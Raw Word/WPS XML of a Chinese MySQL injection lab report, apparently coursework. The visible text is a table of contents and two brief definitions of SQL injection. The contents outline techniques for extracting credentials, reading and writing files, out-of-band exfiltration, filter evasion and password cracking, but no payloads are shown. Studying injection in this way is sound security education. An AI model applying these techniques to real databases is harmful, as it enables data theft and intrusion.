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918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  <w:bookmarkStart w:id="0" w:name="_Toc5382_WPSOffice_Type3"/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_Toc20587_WPSOffice_Level1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d7bcb599-13cb-4cc8-b38e-22eb5697d87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urier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>一、 目标</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="1" w:name="_Toc20587_WPSOffice_Level1Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1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4878b91c-2631-412d-bbbd-07cc4e07df3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1. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>SQL注入</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="2" w:name="_Toc5382_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="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_Toc31168_WPSOffice_Level2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9101406a-c0d7-4098-9598-0f0ff5544b6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2. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>MySQL注入</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="3" w:name="_Toc31168_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="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_Toc5382_WPSOffice_Level1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f48dab76-a5a9-40b8-98cd-109cad186b2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urier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>二、 方法与原理</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="4" w:name="_Toc5382_WPSOffice_Level1Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="4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37d0d120-5b5f-4021-a9d6-ab0efe30a6f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1. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>原理</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="5" w:name="_Toc18866_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="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bf293a8b-1925-4a84-a75e-8da569a1162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2. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>MySQL数据库知识</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="6" w:name="_Toc16428_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="6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_Toc5382_WPSOffice_Level3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fa363c12-8965-4e68-bbd6-adf8741904a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(1) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>默认数据库</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="7" w:name="_Toc5382_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="7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_Toc31168_WPSOffice_Level3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78e51310-57e9-41a6-a3c8-1de4ed94e0d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(2) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>测试注入</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="8" w:name="_Toc31168_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="8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_Toc18866_WPSOffice_Level3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7702d9fa-401b-4a1a-b39c-906c4079f03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(3) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>注释</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="9" w:name="_Toc18866_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:bookmarkEnd w:id="9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_Toc16428_WPSOffice_Level3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c734959c-a0b3-49f3-944e-d36a6beae6b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(4) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>版本</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="10" w:name="_Toc16428_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:bookmarkEnd w:id="10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_Toc18368_WPSOffice_Level3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6636a7ab-82d6-4c37-b5d3-24e414ff693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(5) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>数据库凭证</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="11" w:name="_Toc18368_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1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_Toc22056_WPSOffice_Level3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dcefc8dc-52a2-44cb-83d8-d59137af6b5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(6) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>数据库表名</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="12" w:name="_Toc22056_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>4</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1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_Toc18676_WPSOffice_Level3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39df8b15-2e76-4261-b95e-cfe5587917b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(7) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>服务器主机名</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="13" w:name="_Toc18676_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>4</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1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_Toc11833_WPSOffice_Level3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b37dc667-8c5a-4190-8cf7-8be98b3b713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(8) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>服务器MAC地址</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="14" w:name="_Toc11833_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>4</w:t>
          </w:r>
          <w:bookmarkEnd w:id="14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_Toc15965_WPSOffice_Level3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83b872f8-b7e0-4016-9233-be195d3e44a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(9) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>表和列</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="15" w:name="_Toc15965_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>4</w:t>
          </w:r>
          <w:bookmarkEnd w:id="15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_Toc9032_WPSOffice_Level3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7d3fa1af-9674-46a1-99ed-4938b2a8fb7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(10) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>避免使用引用</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="16" w:name="_Toc9032_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:bookmarkEnd w:id="16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_Toc29941_WPSOffice_Level3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52922168-9c48-45a4-b604-01199975c36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(11) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>字符串连接</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="17" w:name="_Toc29941_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:bookmarkEnd w:id="17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_Toc32078_WPSOffice_Level3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e28b14a3-827e-4785-b168-0bbc5e24a9c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(12) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>条件语句</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="18" w:name="_Toc32078_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:bookmarkEnd w:id="18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_Toc12306_WPSOffice_Level3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b56e32dd-edb1-4cab-91a2-fd9859f50b2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(13) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>定时</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="19" w:name="_Toc12306_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:bookmarkEnd w:id="19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_Toc10377_WPSOffice_Level3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e644f464-c4ea-46db-8544-8965c3ec3ad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(14) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>权限</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="20" w:name="_Toc10377_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:bookmarkEnd w:id="20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_Toc28750_WPSOffice_Level3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382bb772-20a8-4bb7-8f78-26f90507569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(15) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>读文件</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="21" w:name="_Toc28750_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:bookmarkEnd w:id="2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_Toc6963_WPSOffice_Level3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dbb83ed1-2eba-4092-bfc1-8b2b83837f1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(16) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>写文件</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="22" w:name="_Toc6963_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:bookmarkEnd w:id="2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_Toc4826_WPSOffice_Level3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ee3bd39c-7f89-4c48-a54a-778bf84e19e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(17) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>带外通道</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="23" w:name="_Toc4826_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:bookmarkEnd w:id="2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1d903d06-5768-4d72-a33a-8d40f1ba250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(18) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>堆叠查询</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="24" w:name="_Toc1551_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:bookmarkEnd w:id="24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_Toc5217_WPSOffice_Level3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d7dd7bcf-c81c-4ad5-9cc5-6aacdf9259c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(19) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>MySQL特定的代码</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="25" w:name="_Toc5217_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:bookmarkEnd w:id="25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_Toc3661_WPSOffice_Level3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59a30a3c-ac30-4e9e-8544-1d9344e7fba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(20) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>模糊与混淆</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="26" w:name="_Toc3661_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>8</w:t>
          </w:r>
          <w:bookmarkEnd w:id="26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_Toc23508_WPSOffice_Level3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118c474d-a4c3-4288-a2e1-83e93a4c5a4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(21) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>操作符</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="27" w:name="_Toc23508_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>10</w:t>
          </w:r>
          <w:bookmarkEnd w:id="27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b6fde398-0e12-48ae-affb-bf238d70534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(22) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>常量</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="28" w:name="_Toc910_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>12</w:t>
          </w:r>
          <w:bookmarkEnd w:id="28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_Toc21729_WPSOffice_Level3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40e20a99-e033-4efc-9787-2962079dadb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(23) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>密码哈希</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="29" w:name="_Toc21729_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>12</w:t>
          </w:r>
          <w:bookmarkEnd w:id="29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_Toc23316_WPSOffice_Level3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48e02bbb-f5b4-4620-b230-8245d6d462c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(24) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>密码破解</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="30" w:name="_Toc23316_WPSOffice_Level3Page"/>
          <w:r>
            <w:t>12</w:t>
          </w:r>
          <w:bookmarkEnd w:id="30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_Toc18368_WPSOffice_Level2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b30056e5-562c-450f-90db-29abe43a948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3. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>方法</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="31" w:name="_Toc18368_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>12</w:t>
          </w:r>
          <w:bookmarkEnd w:id="3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_Toc31168_WPSOffice_Level1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cbe35dd0-39d3-402c-9cb9-dd44ad55604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urier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>三、 实验结果与分析</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="32" w:name="_Toc31168_WPSOffice_Level1Page"/>
          <w:r>
            <w:t>13</w:t>
          </w:r>
          <w:bookmarkEnd w:id="3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_Toc22056_WPSOffice_Level2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5b5a4c18-53af-4555-835b-7df84a7d150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1. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>实验1：简单的sql注入1</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="33" w:name="_Toc22056_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>13</w:t>
          </w:r>
          <w:bookmarkEnd w:id="3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_Toc18676_WPSOffice_Level2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5ac94c10-ad96-4061-8d17-c76e6b9d268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2. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>实验2：简单的sql注入2</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="34" w:name="_Toc18676_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>14</w:t>
          </w:r>
          <w:bookmarkEnd w:id="34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_Toc11833_WPSOffice_Level2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ace4034a-c429-43cf-ba95-120c3b11a00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Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t xml:space="preserve">3. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>实验3：简单的sql注入3</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="35" w:name="_Toc11833_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>14</w:t>
          </w:r>
          <w:bookmarkEnd w:id="3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_Toc18866_WPSOffice_Level1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918"/>
              <w:placeholder>
                <w:docPart w:val="{23488b19-b9a8-4b85-be89-2dea1b38627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Courier New" w:hAnsi="Courier New" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>四、 总结</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="36" w:name="_Toc18866_WPSOffice_Level1Page"/>
          <w:r>
            <w:t>17</w:t>
          </w:r>
          <w:bookmarkEnd w:id="36"/>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/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628650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3100070" cy="939800"/>
                <wp:effectExtent l="0" t="0" r="5080" b="12700"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon>
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21016"/>
                    <wp:lineTo x="21503" y="21016"/>
                    <wp:lineTo x="21503" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough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53055" y="1543050"/>
                          <a:ext cx="310007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4.65pt;margin-top:49.5pt;height:74pt;width:244.1pt;mso-wrap-distance-left:9pt;mso-wrap-distance-right:9pt;z-index:-251656192;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF" filled="t" stroked="f" coordsize="21600,21600" wrapcoords="0 0 0 21016 21503 21016 21503 0 0 0" o:gfxdata="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XhMrtgAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsB&#10;AhQAFAAAAAgAh07iQF8UtjguAgAAIAQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1s&#10;UEsFBgAAAAAGAAYAWQEAAMc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Courier New" w:hAnsi="Courier New"/>
                          <w:sz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bookmarkStart w:id="37" w:name="_Toc4970_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL注入技术报告</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/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outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc21978_WPSOffice_Level1"/>
      <w:bookmarkStart w:id="39" w:name="_Toc20587_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/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jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc21978_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="41" w:name="_Toc5382_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/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所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New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jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc32473_WPSOffice_Level2"/>
      <w:bookmarkStart w:id="43" w:name="_Toc31168_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL注入就是注入者针对MySQL数据库进行SQL注入。注入者通过简单的注入知道web服务器的数据库是MySQL数据库，注入者了解MySQL的基本知识(如MySQL的内置数据库，MySQL的内置表等)，运用这些知识进行针对性的SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
